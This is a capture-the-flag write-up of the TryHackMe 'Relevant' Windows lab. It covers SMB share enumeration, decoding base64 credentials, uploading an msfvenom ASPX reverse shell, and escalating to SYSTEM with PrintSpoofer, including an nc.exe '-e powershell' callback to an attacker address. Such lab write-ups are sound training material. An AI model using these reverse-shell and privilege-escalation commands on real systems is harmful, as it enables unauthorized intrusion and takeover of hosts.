# TryHackMe Relevant writeup

[Relevant](https://tryhackme.com/room/relevant) is the eighth machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.

### **Enumeration**

`Nmap` scan result:

```bash
nmap -sC -sV -o nmap.txt <target_ip>

80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2016 
3389/tcp open  ms-wbt-server Microsoft Terminal Services

Host script results:
|_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-10-20T05:30:49-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-10-20T12:30:48
|_  start_date: 2020-10-20T11:32:19
```

This time we are working with `Windows Server 2016` and a bunch of ports are open.

Usually, I’m starting with port `80`, but didn’t find any use for that this time.

The machine itself is not so stable, so I had to revert it after doing the `nmap` scan to make it work again.

Enumerating `smb`:

```bash
smbclient -L <target_ip>
Enter WORKGROUP\kali's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk      
SMB1 disabled -- no workgroup available
```

The `nt4wrksv` looks interesting, let’s access it.

```bash
smbclient \\\\<target_ip>\\nt4wrksv
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 25 17:46:04 2020
  ..                                  D        0  Sat Jul 25 17:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 11:15:33 2020

                7735807 blocks of size 4096. 4951106 blocks available
```

The `passwords.txt` contains two pair of credentials encoded in `base64`.

The fasted way to decode them is

```bash
echo <hash>  | base64 --decode
```

And again, I didn’t find any direct way of using that.

That’s it, a dead end. I don’t know what else to try. Everything looks like rabbit holes.

That might be frustrating. The feeling of you is THAT close to getting the shell is real.

If you ask any OSCP student/holder what to do in this case, they for sure will respond with `TRY HARDER` (usually all caps, yeah).

A discussion on what that means to `try harder` can long for hours, so let me just drop this article here:

[Try Harder: From Mantra to Mindset](https://www.offensive-security.com/offsec/what-it-means-to-try-harder/)

Take a deep breath, look around the pieces of evidence that you have.

* two pairs of credentials
    
* up to date services
    
* access to the `smb` where you can’t do much
    

A common scenario is that you creating a shell and upload it to the `smb` share. Normally, in such scenarios, the `smb` share is connected to the web-server and it’s a `wwwroot` directory.

A quick check on that is try to open in the browser the `passwords.txt` as we know the exact location of it:

```bash
http://<target_ip>/nt4wrksv/passwords.txt
```

Nothing. Again. What if we missed something during the enumeration part? Let’s do another `nmap` scan but with the `-p` flag this time:

```bash
49663/tcp open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
```

Aha! Now we also have the port `49663` which is also running the `http`. The content of if is the same as for port `80`, but it doesn’t mean that they are the same.

Let’s try the check that we did for port `80` but this time for `49663`:

```bash
http://<target_ip>:49663/nt4wrksv/passwords.txt
```

There you have it, the content of `passwords.txt` in a browser:

```bash
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
```

---

### **Exploitation**

Now we can try out a scenario where we are creating a reverse shell, uploading it to the `smb`, and triggering it with the browser/`curl` request.

```bash
msfvenom -p windows/x64/shell_reverse_tcp -a x64 -f aspx -o shell.aspx LHOST=<your_ip> LPORT=<your_port>
```

Upload it to the `smb` share with `put` command, open the `nc` listener.

You can trigger the shell by opening the following URL in the browser:

```bash
http://<target_ip>:49663/nt4wrksv/shell.aspx
```

Catch the shell in `nc`.

---

### **PrivEsc**

Let’s check the privileges that our current user has:

```bash
c:\inetpub\wwwroot\nt4wrksv>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

Alright, the `SeImpersonatePrivilege` is enabled!

Normally, I would try to use [`JuicyPotato`](https://github.com/ohpe/juicy-potato), but this exploit is not very stable either.

I also could try the `incognito.exe` that I used for the exploitation of [Alfred](https://hackish.space/Alfred), but I started this series to expand my knowledge and try out new tools and techniques.

I’ve heard a lot of quite a recent tool - [PrintSpoofer](https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0), it’s a great opportunity to try it out!

As we have access to the `smb` share, you can download the `x64` version of the latest `PrintSpoofer` and upload it there.

You can find the uploaded file here: `c:\inetpub\wwwroot\nt4wrksv`.

The tool is very easy to use:

```bash
c:\inetpub\wwwroot\nt4wrksv> PrintSpoofer.exe -i -c powershell
```

You can also create a reverse shell with it:

```bash
c:\inetpub\wwwroot\nt4wrksv>  PrintSpoofer.exe -c "c:\inetpub\wwwroot\nt4wrksv\nc.exe <your_ip> <your_port> -e powershell"
```

---

### **Takeaway**

* TRY HARDER
    
* TRY HARDER
    
* TRY HARDER
